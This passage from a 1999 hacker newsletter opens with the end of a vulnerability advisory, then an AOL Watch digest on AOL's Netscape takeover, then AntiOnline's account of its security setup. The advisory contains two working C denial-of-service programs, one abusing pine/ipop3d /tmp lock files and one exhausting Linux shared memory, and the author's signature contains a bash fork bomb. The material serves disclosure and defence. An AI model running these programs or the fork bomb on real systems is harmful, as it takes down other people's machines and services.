buffer. It is possible to overwrite some data, and registers as well. For testing purposes, simple exploit code presented below (vunerabilities 3 and 4) could be used - suggested changes: write(i,"-1",2) -> write(i,"(about 1100 b)",1100) truncate(i,2) -> truncate(i,1100); Overflow in pine might be used to gain other lusers' privledges (or, sometimes, root privledges, depending on his stupidity ;-). Exploited overflow in ipop3d could be used to gain superuser access (the only thing done by ipop3d is setuid+setgid, no seteuid/setreuid). CAC.Washington.EDU ipop3d is shipped by default with Red Hat Linux, included in IMAP package. Solution: in both cases, you have to look for something like kill(i,SIGUSR2) in sources and modify lines just before it ;> - 3. Lockfile vunerability in pine 4.xx (Linux) 4. Lockfile vunerability in ipop3d 4.xx The problem is probably well known, but silently ignored by pine vendors. Unfortunately, it's possible to turn 'mostly harmless feature' in something nasty - following code allows various DoSes by killing all processes of luser (could be root?) every time he/she runs pine or receives mail via POP3 protocol: -- lock-exploit.c -- // Pine 4.xx, ipop3d 4.xx and other /tmp-lock based mail stuff. #include #include #include main(int argc,char* argv[]) { int i,a=0; char s[100]; struct stat x; if (!argv[1]) exit(printf("Usage: %s account_name\n",argv[0])); sprintf(s,"/var/spool/mail/%s",argv[1]); if (stat(s,&x)) exit(printf("Mailbox (%s) not found.\n",s)); sprintf(s,"/tmp/.%x.%x",(int)x.st_dev,(int)x.st_ino); fchmod(i=open(s,O_RDWR|O_CREAT,0600),0666); while (1) { lseek(i,0,0); write(i,"-1",2); ftruncate(i,2); fsync(i); if (!a++) if (!flock(i,LOCK_EX)) printf("Got lock on %s.\n",s); else printf("File %s already locked, wait...\n",s); sleep(1); } } -- eof -- Works well under Linux. Under BSD, pine seems to have broken mailbox access negotiation (fortunately ;-). No information about ipop3d. Mainly, this vunerability demonstrates that world-writable mailbox locks in /tmp are SICK IDEA (one day, as I recall, one of pine vendors said it's 'harmless', while other solutions allows several DoS attacks... huh). - 5. Linux 2.x IPC vunerability Linux IPC implementation seems to be broken. I noticed Alan about one/two months ago, so I believe it has been fixed in recent 2.2.x Linuxes. In fact, any luser may consume whole memory available on system using this simple program: -- shmkill.c -- extern int errno;int i,d=1;char*x;main(){while(1){x=shmat(shmget(0,10000000/ d,511),0,0);if(errno){d*=10;continue;}for(i=0;i<10000000/d;i++)if(*(x+i));}} -- eof -- Memory won't be freed even if luser's process will be killed, you have to use ipcrm, but there could be not enough memory to run anything :-( Under early 2.2.x, you have to run this program several times, to ensure pages are detached (in this state, they are onwerless ;-). The simpliest solution is to restrict for lusers IPC at all. Only a few programs uses IPC - probably only dosemu and ShoutCast ;> - 6. Linux 2.x mmap vunerability Linux 2.0.36 has the similiar problem with copy-on-write pages allocated with mmap - as these pages are not accounted within per-user limits. Fortunately, it's less harmfull than (5), because memory will be freed as soon as process owning it will be killed. Exploit will be NOT posted - see above. - 7. Midnight Commander 4.x bugs (x2) Still not fixed. Temporary files mc are created in insecure way, allowing typical races. Also, entering directories containing $(...) somewhere might result in execution of embeeded code. Described days ago, dunno why it hasn't been patched. _______________________________________________________________________ Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM] [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] @HWA 20.0 News from AOLWATCH ~~~~~~~~~~~~~~~~~~ Date: Fri, 2 Apr 1999 15:36:20 -0800 (PST) From: David Cassel To: AOL Watch Subject: AOL Watch: Hackers, Netscape, Death of AOL? Sender: owner-aolwatch@cloud9.net Precedence: bulk X-List-Server: Cloud 9 Consulting, Inc. http://www.cloud9.net H a c k e r s, N e t s c a p e, D e a t h o f A O L ? ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ AOL finalized their acquisition of the browser company Netscape. And many Netscape employees scrambled for the door. "So many good people have left by this point anyway," one Netscape staffer writes on their web page. "People who were with Netscape for 3 or 4 years..." http://www.tarin.com/aowhat/aodiary.html Did AOL's unpopularity precede them? "Three other people I know are leaving within the month, regardless," the page continues. "I don't think any of them have jobs lined up or are even very interested in looking. Joe left last week without even waiting the week it would take him to get the bonus check." Steve Case had offered each of Netscape's 2300 employees an extra month's pay to stay until the takeover was complete, according to Wired News. ("AOL's mainstream corporate bent has long made it akin to the antichrist in the eyes of early Net users," the article notes, "scores of whom came to work at Netscape in its youth.") http://www.wired.com/news/news/business/story/16564.html But though the disgruntled Netscape staffer remained, they created an on-line diary -- "Doom@Netscape.com" -- chronicling low morale after AOL's takeover. ( http://www.tarin.com/aowhat/aodiary.html ) Their site also offered a series of answers to frequently-asked questions, titled "How does it feel to wake up as an AOL employee?" "It sucks, duh." http://www.tarin.com/aowhat/aofaq.html "I've been proud to work for Netscape, and I will never be proud to work for AOL." They linked that response to the "Why AOL Sucks" site. ( http://www.aolsucks.org ) Harsher criticism came yesterday from Netscape's Jamie Zawinski. "This buyout meant that Netscape's executives had finally given up." http://www.jwz.org/gruntle/aol.html In an on-line essay explaining his resignation from a high-profile project overseeing code for the Mozilla browser, Zawinski too felt compelled to link to the "Why AOL Sucks" page. http://www.jwz.org/gruntle/aol.html http://www.aolsucks.org/censor/ Elsewhere, he articulated his philosophical objections to AOL. "AOL is about centralization and control of content. Everything that is good about the Internet, everything that differentiates it from television, is about empowerment of the individual. I don't want to be a part of an effort that could result in the elimination of all that." http://www.jwz.org/gruntle/nomo.html Some have resigned themselves to the inevitable. At one recent function at Netscape, visitors made dark jokes about not spilling drinks on AOL's carpet. But at least one Netscape employee captured their feelings with an e-mail tag-line re-writing South Park's familiar refrain. "Oh my God! They killed Netscape!" There was just one question remaining when Steve Case made an appearance at Netscape. "After the deal closes, will you stop sending me disks?" Steve Case answered evasively. "Well, the thing is, I'm sure you have neighbors, or friends, or family, who don't yet know about the power of the Internet, and I think you'll want to share--" "I think," Netscape's Jim Barksdale cut in, "his answer is no." http://www.tarin.com/aowhat/caseinterview.html AOL began their reign by laying-off hundreds of workers -- a whopping 425 Netscape employees. ( "You've Got Pink Slips," read one headline. ) http://fnews.yahoo.com/street/99/03/25/valley_990325.html But there may be more bad publicity ahead... The Department of Labor has launched an inquiry into AOL's employment practices, AOL Watch has learned. Additional information came from an AOL watchdog web page, which suggests the issue is the lack of wages paid to on-line staffers. Is AOL employing a force of strictly-controlled volunteers, using AOL tools to perform the same integral work as paid employees? http://www.observers.net/dol.html The page includes contact information for a Department of Labor officer -- and even a case number. Reached for comment, a Department of Labor officer added only "If we have an open investigation, I am not allowed to talk to the reporters." But they acknowledged an awareness of the page's existence. But AOL's contact with the federal government doesn't end there. "AOL is flexing its muscle in the political world," one MSNBC article noted in November -- citing an "ambitious lobbying campaign" which is just "one piece of a multi-pronged effort by AOL to increase its influence on the government's decision-making process." http://www.zdnet.com/zdnn/stories/news/0,4586,2167455,00.html AOL appears concerned they'll be replaced by high-speed cable internet access -- and they've been aggressively lobbying with other companies for a place in cable offerings. In February, however, C|Net reported that "Internet service providers were dealt a blow...when the FCC decided to postpone any decision on whether ISPs had the right to lease access on cable companies' pipes..." http://www.news.com/News/Item/0,4,31930,00.html Meanwhile, AOL's position drew sharp ridicule from the "Frontiers of Freedom" -- a non-profit organization founded by former U.S. Senator Malcolm Wallop. "AOL is now calling for the heavy hand of government to stifle competitors and to regulate access to the internet," the group's web site complains. "[H]aving made a bad business decision to sell its own network, AOL has no business inviting government to hamstring competitors -- who have developed a superior product that's 50 to 100 times faster than AOL's -- by regulating them." http://www.ffreports.org/ The criticisms are withering. "While they fight Internet censorship (even going to bat for the free speech rights of a pro-Klan group), they were less tolerant of a website entitled, www.aolsucks.com," the organization notes. "That one hit too too close for comfort..." the page continues -- apparently referring to the incident detailed at http://www.aolsucks.org/webcens/ But more withering comments were submitted by readers. "Come on AOL, stop wasting money on government lobbyists and put your money into building a better product." "If this is the way we want to do things in this country, then I'm going to start a whale oil lamp company and sue the local electricity companies for putting me out of business; it makes as much sense." "The pure unmitigated gall of Steve Case is unbelievable." http://216.46.238.18/ubb/Forum2/HTML/000001.html http://216.46.238.18/ubb/Forum1/HTML/000002.html The site may be bad news for AOL. It offers visitors the ability to easily contact relevant FCC and Congressional officials on-line. ("We'll make sure your e-mail is delivered, and your strong beliefs are heard.") http://ffreports.org/help/index.html AOL has made light of their own drive for dominance. "We think it would be good if the IRS would, on your tax form, just have a checkoff box, 'Do you currently subscribe to AOL,'" Steve Case joked at the National Press Club in March of 1996, "and if you don't, we'll send you the disk and we can eliminate a lot of duplication and waste." But the reality is less jovial. AOL recently filed legal attacks against AT&T's "WorldNet" service -- for using the phrase "You have mail." AOL's request to block use of that phrase -- along with the phrases "Buddy List" and "Instant Message" -- was rejected by a Federal District Court Judge in early January. "The AOL lawsuit provides a glimpse into a Web future where lawyers chase ambulances in cyberspace," observed Roger Ebert this month in his Yahoo! Internet Life column. AOL's behavior suggests a philosophical danger. "We're pleased that Judge Hilton has rejected this attempt by AOL to appropriate common Internet terms for its own exclusive use," AT&T's counsel announced in a statement. But he added that "we feel this sort of overreaching by one company raises serious concerns about whether AOL is truly committed to keeping the Internet an open platform, or whether it intends to leverage its dominance to make the Net more proprietary." http://www.att.com/press/item/0,1193,262,00.html http://www.news.com/News/Item/0,4,30479,00.html Strangely, the Wall Street Journal had reported last Friday that AOL was "winning respect across Silicon Valley." But that same day, the Associated Press reported a high school drop-out broke into AOL's mainframe. http://www.usatoday.com/life/cyber/tech/cte673.htm And hours later, an AOL account was fingered as the original distributor of the Melissa virus. Described as "the most widespread computer virus ever seen," both Reuters and the Associated Press published the AOL screen name to which it was eventually linked. The account's member profile connected the name to a 37-year-old civil engineer in Lynnwood, Washington -- who says the virus-distributor had stolen access to his account. "I am a little jarred about the lack of security that AOL has in place," the engineer told C|Net, "and am now going to close my AOL account." http://www.news.com/News/Item/0,4,34435,00.html http://www.abcnews.go.com/sections/tech/DailyNews/virus990330.html Ironically, pulling up his account's profile Tuesday displayed an AOL banner ad advising, "Send your love on-line." Today the Associated Press reported the virus's originator was " snared with the help of technicians at America Online, and a computer task force of federal and state agents." http://cbs.marketwatch.com/archive/19990402/news/current/melissa.htx "This is why my aunt can't get through to AOL's tech support," one users joked on an on-line bulletin board. "They're all busy chasing virus writers! :) " http://slashdot.org/comments.pl?sid=99/04/02/1542253&threshold=-1&commentsort=0&mode=thread&cid=2076 It's not the first AOL-related incident. VicodinES, whose work may have assisted the virus's true creator, brags about creating an earlier virus disguised as an AOL anti-crash patch, according to Ziff-Davis News. And AOL "Trojan Horses" are nothing new. MSNBC reported on the picture.exe password-stealer in January. http://www.zdnet.com/zdnn/stories/news/0,4586,2235046,00.html http://www.msnbc.com/news/229572.asp But security problems ultimately affect AOL's business operations. In October, the Associated Press reported that a 21-year-old hacked into AOL's call-center server in Ogden to send a threatening instant message. ("We are sick of your censorship and bad service," it began...) http://www.desnews.com/cgi-bin/libstory_reg?dn98&9810180329 AOL has actually drawn continuing criticism for their technical shortcomings. Wired News reported AOL only began testing their components for year-2000 glitches in January. While that may have been soon enough, a "Y2K" consultant warned the news outlet that "if it turns out they do have compliance problems, there's no time left at this point." http://www.wired.com/news/news/business/story/17911.html In fact, outages are one of AOL's ongoing expectations. "I would like to be able to tell you that this sort of thing will never happen again," Steve Case commented in 1996 after a 19-hour nationwide outage, "but frankly, I can't make that commitment." Ultimately the latest problems may represent business as usual in AOL's hacker-friendly environment. In 1995 hackers stole Steve Case's e-mail. In 1996 the Washington Post reported AOL cancelled 370,000 accounts in one three-month period for "credit card fraud, hacking, etc." (9/16/96.) And by 1998, hackers had hit at least 34 AOL areas -- including the highlights for Steve Case's monthly updated. (It's title bar changed to "Hey there sexy.") http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1995/09/07/MN16190.DTL http://www.aolwatch.org/acluhack.htm http://www.aolwatch.org/hacks.htm AOL's hacker community may even have its roots in AOL's history. Until September of 1995, AOL didn't confirm the authenticity of credit card information submitted for free-trial accounts. The 370,000 cancelled accounts the next Spring may indicate how entrenched the hacker population had become. But when AOL's on-line staff questioned lax policies, AOL Vice President Kathy Ryan showed indifference. One on-line gathering was told, "we understand that our aggressive distribution of both software and certificates can result in 'throwaway' accounts. We have made the business decision that the benefits in this case outweigh the disadvantages..." In those crucial early months, AOL remained silent on the dangers of "password-thieves." (Password-fishing con artists who turned access to one AOL account into unauthorized access to several others.) Terms of Service staffer Chip Douglas ultimately explained AOL's dilemma -- marketing over security -- to another on-line gathering. "Many times we (AOL) are caught between a rock and a hard place debating over the importance of our 'community' while still trying to be as open to new members as possible, and NOT scare them away with needless (?) warnings about PW scammers, etc." Later that year, Steve Case made his first public acknowledgment of the problem -- and Netscape's Security Documentation Manager forwarded the entire letter to the Cypherpunks mailing list. "Looks like AOL is being dragged, kicking and screaming, into the world of security," he crowed. But now Netscape is being dragged into the world of AOL. The "Doom@Netscape" site answers the question "What are you going to do now?" by saying "Wait and see what happens. What else can I do?" That employee got an answer Wednesday. They were laid off. THE LAST LAUGH Staffers at Netscape's "NetCenter" may have gotten the last laugh. Last week their site offered two news headlines -- one announcing "AOL Cuts Jobs at Netscape." The second may have voiced related concerns. "Working for an idiot?" it read. "Do something about it!" David Cassel More Information - http://www.sjmercury.com/columnists/cassidy/docs/mc112598.htm http://www.aolsucks.org/list/0050.html http://www.nytimes.com/library/tech/99/01/biztech/articles/31aol.html http://www.angelfire.com/co/atomikspage/letter.html ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ Please forward with subscription information. To subscribe to this list, type your correct e-mail address in the form at the bottom of the page at http://www.aolsucks.org -- or send e-mail to MAJORDOMO@AOLWATCH.ORG containing the phrase SUBSCRIBE AOLWATCH ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ @HWA 21.0 AntiOnline. hack attempts and intelligence gathering. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 25 Mar 1999 19:31:45 -0700 (MST) From: mea culpa To: DC-Stuff Subject: Antionline Security & Hacker Intelligence Message-ID: Sender: owner-dc-stuff@dis.org http://www.AntiOnline.com/SpecialReports/antionline-security/ [Anti-online has published some details about how they stay so secure from those attacks launched from "175 unique hosts a day". Curious tho..] http://www.AntiOnline.com/SpecialReports/antionline-security/router.html We use both static and recursive access lists, as well as TCP Intercept (I'll go more in depth about those below). The router can only be accessed via console (almost totally eliminates the fear of someone breaking into the router, which would be a bad thing.) http://www.AntiOnline.com/SpecialReports/antionline-security/omg.html If the "user" has done several hack attempts against us, the system may escalate the attempt, and actually set up a deny statement in our router, which stops the host from even passing data into our lan. [So how does their program update the router if there is console only access?] http://www.AntiOnline.com/SpecialReports/antionline-security/info-gathering.html Not only do we try to keep up with the latest exploits and vulnerabilities, we also try to keep up with the latest THREATS. Exploits are no danger to a system at all, if there's no one trying to use them against you. But, as with many networks, there never seems to be a limited supply of people willing to use those exploits against us. So, one of the things that we do (and dedicate a lot of resources to), is gathering intelligence. What are the active hack groups? Who's in those groups? What groups were those people in before this one? What exploits were used? What are their motives? What are they saying to other hack groups? What sites have they hit? What domains do they have access to? So on and so on. [So JP/AO are now gathering profiles on active hacking groups. Seems these groups that talk to him for his stories should be careful what they say.] -=- -=- From AntiOnline Greetings All: I was planning on writing this up in a formal, stuffed shirt, journalistic mode, but soon decided that wasn't me, and that I'd be able to explain it better in my "MailBag" style of writing. So, I've warned you. Continue reading at your own risk, heh..... I get dozens of e-mails a day asking me different questions about our own security. What products do we use, what policies do we have, how do we monitor, administer, firewall, and so on? Well, here it is. I'm going to go through our current security infrastructure step by step. I'll give you everything from descriptions of proprietary in-house software that we use, to our Cisco router configuration files. I've always said (as have many, many others for that matter), that there is no such thing as "security through obscurity", so I'm going to practice what I preach. I don't want the "average users" that read our site to get intimidated at this point. I'm going to go through everything step by step, provide links where you can learn more about any subject which becomes "technical", and will use common English (which I use anyway. I hate reading books written by college professors which put forth a larger effort convincing the reader they know every technical bit of jargon under the sun, than they do actually explaining their subject matter). Also, I hope to dispel the common myth that securing a network has to be an expensive endeavor. We are not a big budget operation by any extent of the imagination, and you don't have to be one either. So without further delay, here it is. The AntiOnline Information Security Systems and Policies. Yours In CyberSpace, John Vranesevich Founder, AntiOnline 1 Environmental Security (I'm not talking about our operating systems.) 2 Garbage In, Garbage Out (How secure is our uplink?) 3 Ground Zero (Using Our Router As A First Line Of Defense) 4 There's No Place Like Home (Our desktops, or a battle ground?) 5 Watching Our Network (Highways have patrolmen and so does AntiOnline's network.) 6 OH MY GOD IT'S A HACKER!!! (Calling their ISP doesn't cut it, we have to stand up for ourselves!) 7 Neighborhood Watch (The woman across the street with a pair of binoculars, or BugTraq?) 8 Great, We're Finally Secure (No we're not.) Environmental Security (I'm not talking about our operating systems.) Let's start at ground zero. Our offices. Having advanced digital security in place does us no good if our physical and environmental security is lacking. While this is probably not the most exciting or technical issue that I'll be covering, I felt it important to include in the overview of our system. Physical Security: We use a wireless security system by Linear. There are a couple of good things which attracted us to this system. First, it's all battery operated, with the exception of the base unit. The base unit does, however, have a battery back-up incase of power outage. We use standard door and window censors, as well as motion and heat change detectors, smoke alarms, and carbon dioxide detectors. If a sensor is triggered, it sends an alert signal to our base unit, which sets off a loud audible alarm, as well as contacting our monitoring service. The sensors also send an "on-line signal" once every minute to the base unit. If the base unit fails to receive a signal from one of these devices, the alarm is sounded as well (this protects against signal jammers and the like). There are only a few vulnerabilities that I could predict for this system. The main one would be someone cutting the phone lines where they enter the building. Although we'd still get an audible alarm, the monitoring station wouldn't be contacted, unless by us directly using a cellular phone, or by a neighboring business hearing the alarm and alerting the police, which patrol this area on a regular basis anyway (We found out that the police have a very good response time to our location. We had to call them once to report a "suspicious vehicle" that was sitting in our parking lot at night for some time with all of its lights off. It turned out that the vehicle contained little more than a couple of teenagers that decided to use our parking lot as a convenient place to test out their vehicle's shocks, if you know what I mean.) Our system also includes a closed circuit television system, which sends footage via video cables to a monitoring station and vcr in my apartment. Outdoor lighting is on at all times after dark, and battery operated exit lighting is activated during power outages. Every floor also has a fire extinguisher mounted in a convenient place. The major vulnerability that we currently have as far as physical security goes would be from herf or tempest related attacks. With a herf attack, we would only have to worry about the loss of data, and not the compromise of it (we do include current copies of nearly everything off site). Due to our location, a tempest attack would be very difficult, and incomprehensibly unlikely. If some agency is sitting in a van outside of our office and is monitoring us via tempest, we have a lot more problems to worry about than our data being compromised. Environmental Security: Our office has both central heat and air, and we try to maintain a constant in-door temperature of 70 degrees. Each room has a Kenmore Hepa-Filter and Air Ionizer to help maintain a dust free atmosphere. We use "Office Care" anti-dust and static wipes on all monitors, and lightly mist the office carpeted floor with a mixture of liquid fabric softener and water once a week (That is a GREAT tip to ensure a static free environment that I picked up from the 1996 International Super Computing Convention). We also shred EVERY scrap of paper that leaves the office with an "Office Companion" paper shredder (making sure that we stir it all up before throwing it away (Yes, we actually do this, scarry, isn't it?). This helps to stop any dumpster divers from getting any trade secrets, or other goodies from our garbage. Every window has a mini-blind on it, which would make it difficult to look over our shoulders from 100 feet away with binoculars. We usually have loud music playing which would make it very unpleasant to try and spy in on us with a laser listening device pointed at a window (haha). All computers in our offices are on battery back up systems. We have a calibrated up-time of a little under 3 hours without electricity on all servers and network equipment. We have both rack mount and floor model APC Smart-UPS systems. One of our network monitoring stations alerts us in the event of a power outage, and all servers get safely shut down when the batteries reach a critically low level (this is all done through the Smart-UPS software). Garbage In, Garbage Out (How secure is our uplink?): It's an expression that my high school chemistry teacher used to use when working with complex formulas, but I've found it to apply to information security (and many other things) as well. Having a very secure lan does little good if there's someone sitting on our upstream provider sniffing every un-encrypted packet that comes into us or leaves from us. We go through a company called "StarGate". They're the largest ISP in the Pittsburgh area, with over 20,000 customers, 1,500 of which are corporate. Now, there is one bad thing to assume here. "Oh, it's a huge ISP, they must really know what they're doing, and be very secure". Well, don't count on it. Our first step was to compile a list of a half dozen different ISPs. We chose these based on the speed of the backbone that they have, available services that they offered, the size of their staff, the types of technology that they implemented, and of course, cost. We found that Stargate had a redundant dual T3 connection to the backbone, a staff of over 60, and although their fees were a little more than some of their competitors, we felt that they were probably the best over-all ISP for us. We called and talked to both corporate account agents, and engineers, to get a feel for the staff and the technology that they use. We did several trace routes from various machines through their network, to get an idea of how traffic was routed, and even checked for any obvious security holes. As standard procedure, StarGate usually monitors traffic to their customer's networks so that they can be alerted automatically if the circuit goes down, and so they can keep bandwidth usage reports. They also are accustom to providing both DNS and Email services for nearly every one of their customers. We decided, to help ensure the integrity of our data, that we would disable their ability to monitor our traffic and bandwidth (which meant setting up special arrangements to allow them to be notified if our circuit goes down), and to do all of our own service hosting (which includes e-mail and dns). Our email server sends directly to all remote hosts, instead of using our ISP's server as an intermediary. If I had first choice, I would have gotten a connection directly to the backbone (which you can get from Sprint for about the same as going through an intermediary ISP). That would have eliminated an entire network from our loop, but we found that due to our location, that would have been nearly impossible due to the distance that the circuit would have had to travel (in other words, T-1s have distance sensitive charges, and Bell Atlantic would have socked it to us). Ground Zero (Using Our Router As A First Line Of Defense): Although it takes security on all levels to ensure a secured lan, this is what I consider to be THE MOST single important security measure that we have in place. We use a Cisco 2611 router with integrated csu. We upgraded both the ram (with an extra 32meg dimm) and the IOS server software to 11.3.7(T) Enterprise Plus edition. This allows us to implement the newest security features offered by IOS. Before I go any further, let me give you all a little piece of advice on buying ram for your Cisco Router. For THE LOVE OF ALL THAT IS GOOD, do NOT by your ram from Cisco. We priced a 32 meg dimm from cisco as being almost $1,000. Now, through a third party vendor (which was kindly pointed out to us by Corey Gallatin), we only paid $70. The vendor is Crucial Technology, they're worth a look (you can get flash memory cheap too). We use both static and recursive access lists, as well as TCP Intercept (I'll go more in depth about those below). The router can only be accessed via console (almost totally eliminates the fear of someone breaking into the router, which would be a bad thing.) We also log all denies to a syslog server (I'll talk more about what we do with those in my section on network monitoring). Below is the actual configuration file from our Cisco Router (All of the relevant parts of it anyway. I took out things like the interface definitions, routing information, encrypted password strings, etc. This is by no means meant to be an example to follow for setting up a cisco configuration file, but mainly to show our use of access lists to deny traffic into our internal lan). We spent a great deal of time auditing our systems and determining our risks before creating this file. It's important to have a list of all servers and what services they're running. It's also important to have a list of all workstations along with a description of how much access each one of them should have to the lan and the internet. This will make it MUCH easier to come up with your final configuration without too much trouble. Router config file with commentary by JP. ! Being able to finger current connections to the router is evil. Disable it. no ip finger This is the start of the tcp intercept configuration. TCP Intercept is a relatively new feature of IOS designed to stop SynFloods. The router will check to make sure that every new connection coming in is valid, and then creates an internal table of each connection, valid or invalid. It will permit through only valid connections, which stops synflooding, and having an internal table means it only has to verify connections from a host once within an established time period, which cuts down on router processor utilization (but eats up the ram, which is why we upgraded it). ip tcp intercept list 199 ip tcp intercept connection-timeout 7200 ip tcp intercept max-incomplete low 100 ip tcp intercept max-incomplete high 550 ip tcp intercept one-minute low 100 ip tcp intercept one-minute high 550 End of tcp intercept configuration, with the exception of the access-list, which is below ! I took out all of the interface configurations with the exception of the one below, simply because they're not relevant. interface Serial0/0.112 multipoint We'll set up both an incoming and outgoing access list. ip access-group reflexin in ip access-group reflexout out no ip unreachables no ip route-cache no ip mroute-cache That's all of the relevant configurations in this interface. ! Here's our access list for all incoming traffic ip access-list extended reflexin deny ip any host 208.195.220.45 log-input deny ip any host 209.166.177.33 log-input deny ip host 209.166.177.35 host 209.166.177.35 log-input deny ip host 209.166.177.36 host 209.166.177.36 log-input deny ip host 209.166.177.37 host 209.166.177.37 log-input deny ip host 209.166.177.38 host 209.166.177.38 log-input deny ip host 209.166.177.42 host 209.166.177.42 log-input deny ip host 209.166.177.50 host 209.166.177.50 log-input deny ip host 209.166.177.51 host 209.166.177.51 log-input deny ip host 209.166.177.52 host 209.166.177.52 log-input deny ip host 209.166.177.55 host 209.166.177.55 log-input evaluate alliptraffic permit udp any host 209.166.177.35 eq domain log-input permit udp any host 209.166.177.36 eq domain log-input permit tcp any host 209.166.177.36 eq smtp log-input permit tcp any host 209.166.177.36 eq pop3 log-input permit tcp any host 209.166.177.37 eq www log-input permit tcp any host 209.166.177.38 eq www log-input permit tcp any host 209.166.177.42 eq www log-input permit tcp any host 209.166.177.50 eq www log-input permit tcp any host 209.166.177.51 eq www log-input permit tcp any host 209.166.177.52 eq www log-input permit tcp any host 209.166.177.55 eq www log-input deny tcp any any lt 1024 log-input deny tcp any any gt 1023 log-input deny udp any any lt 1024 log-input deny udp any any gt 1023 log-input Here's our access list for all out going traffic. ip access-list extended reflexout permit ip any any reflect alliptraffic Here's the access list for tcp intercept access-list 199 permit tcp any 209.166.177.0 0.0.0.255 ! logging buffered 4096 informational We send all logs to our syslogd located on one of our monitoring stations. logging 209.166.177.42 ! There's No Place Like Home (Our desktops, or a battle ground?): Oook, now starts the fun stuff. Workstation and Server security. There's a well known phrase in the security field which goes something like "If you have physical access, you have administrative access". Meaning that there are several ways to gain access to a machine if you're sitting in front of it. We do several things to help prevent this. For starters, head into the BIOS and turn off booting up from floppy or CD. Common sense, but there are many a high school admin that's been burned by a 7th grader by not doing this. Our servers all have locking cases (which require a key to open), and some use fingerprint recognition units to allow us quick and secure access to them (without having to remember a long password which changes regularly. Stop the stickies!). My personal workstation has a MaxLock hardware encryption device installed, which dynamically triple DES encrypts and decrypts all data on the hard drive. Now, with the exception of my personal machine, it would be possible for say, a governmental organization to come in here with a warrant, confiscate all of our equipment, and take the data right off of it (with the exception of my machine, which has the dynamic hardware encryption). I'll be the first to admit that having locked cases with biometric units attached would do little good to prevent this. However, all important data is stored on removable units, which are all sufficiently encrypted.Our main concern is not from government intervention, but rather from some third party breaking in and running off with equipment (which is why we have an extensive physical security system in place). To take care of network oriented intrusions on the servers: We use Memco's "Secured" (for solaris), which is an incredible product that all but eliminates the possibility of buffer overflow or root attacks. We also run ISS's "RealSecure Agent For NT" (see my chapter on network security for more information on RealSecure). NT based servers and workstations use Norton AntiVirus (I would highly recommend Norton System Works by Symantec for a low cost set of utilities for win based systems). Of course, we use PGP for encrypted e-mail communications. Keep in mind those are used on top of standard security measures, such as insuring that we're never running a service that has known vulnerabilities, using strong passwords that are changed on a regular basis, etc. Watching Our Network (Highways have patrolmen and so does AntiOnline's network): We do a LOT of network monitoring. I'm not going to go into the boring details of EVERYTHING that we do, but here's a look at some of the more important things. To keep an eye on data running over our network, we primarily use ISS's Real Secure. I can't speak highly enough of this program. It watches the network for certain attack signature, and can do several things when it finds them. First, we have it notify a console on one of the monitoring stations, then kill the remote connection to our network where the attack is coming from, update our "hack attempts" page on AntiOnline, and log everything into a database (this database will be used to dynamically put deny statements into our router to firewall trouble users off of our lan once and for all). The console monitoring and connection kill are built in features of RealSecure, everything else is done via proprietary actions that we programmed on our own (realsecure will pass parameters to external programs on event, if you choose to have it do so). RealSecure also has agents which can sit on a server and watch it, sending information back to the console machine, although we currently only have this implemented on one of our servers for test purposes. Now, there is one problem that could arise by using RealSecure. Obviously, what it's doing is throwing the interface card into promiscuous mode, and sniffing the network. Now, this works just fine if you're using a standard hub, but if you're using a switched hub (which prevents sniffing, which is a good thing), RealSecure will not be able to monitor the network, which means that it won't be able to detect attacks (other than attacks reported to it from Agents which sit on the server machines). So, what we did was get an HP Switch, which will allow switching for every port, except a "Master Port" which can be configured to receive all data. So, the only machine on our network which can sniff, is the network monitoring station. Another alternative to this would be to set up a sort of switch DMZ (de-militarized zone), where the data coming in from your router would go to a primary un-switched hub, which your network monitoring stations would run off of, then going into a second, switched hub, that the rest of your network would run off of. Using the HP configurable switch saved us the money and hassle of having to do that. AntiOnline's Hacker Tracker: AntiOnline's Hacker Tracker is a work in progress for us. It gives me something to do in my spare time, and is forcing me to learn more about programming than I had ever wanted to. Heh. Here's a brief overview of this experimental system, as well as what I hope it will become in the future: We pay no attention to most of the attacks against us. The types of attacks which appear on our "hack attempts page", are simply sent through an automated system which log them, database them, etc. Those aren't what we're worried about. What we're worried about are the attacks which DON'T fit into common, predefined categories which we have set. Most security scanners now, including RealSecure, look for "attack signatures". This system works great if the hacker is using a KNOWN method of hacking a system. However, if the hacker is using a "new method", it's useless. So how do we look for something, when we don't really know what we're looking for? Every user that makes a connection of any type into our lan is expected to do certain "normal" things. Here's an example: We can expect a user to connect to www.AntiOnline.com, and shortly there after it would be "normal" to see a connection from that same host on www.AntiSearch.com, or to noc.AntiOnline.com. That is "normal" behavior. A user following links on the site, looking at different pages, which may be on different servers. However, suppose we see a user which does something like this: We see a host connect to www.AntiOnline.com, and then to www.AntiSearch.com. Then, we see the same host connecting to our smtp server. This is NOT "normal" behavior. If the user was simply providing feedback on the visit, it would either be done via contact forms on our site (which would be "normal" activity), or we would see a connection to the smtp server from a separate, outside host (which would be indicative of the user sending us an e-mail, which "normally" would be sent to an intermediary mail server, which would pass the mail along to us). So, seeing the host connecting to our smtp server directly could mean that they're using a mail client which "direct connects" to our server (which is rare), or they have a mail server set up on the same machine that they're surfing from (which is also rare, unless in the case of a shell server, but our page looks sucky in lynx, so that's rare too). While what the user is doing may not really be a hack attempt, it is not "normal" activity for our network, so it's flagged for us to look at. While the above is not something that our system would actually flag for us, it should give you an idea of how our system works. We've been working on it for a while now, and it continues to grow and evolve as we do. We hope to make it much more advanced in the future, by taking data from the thousands of hacks that we have on file, and turning it into an actual "artificial intelligence system" which can examine behavior in comparison to known attempts on thousands of other sites. I'm by no means a great programmer, so maybe in the future we will hook up with someone to turn this into something cool. Our Router: On top of using a network monitoring station, we also have our router send us logs of every "deny" and every "allow" that are initiated by the access lists, which are sent to a network monitoring station. These logs are parsed by a proprietary program that we wrote, and sent into a MiniSQL database. Syslogs from some servers are passed to this machine as well, and processes on the servers are matched against the processes coming through 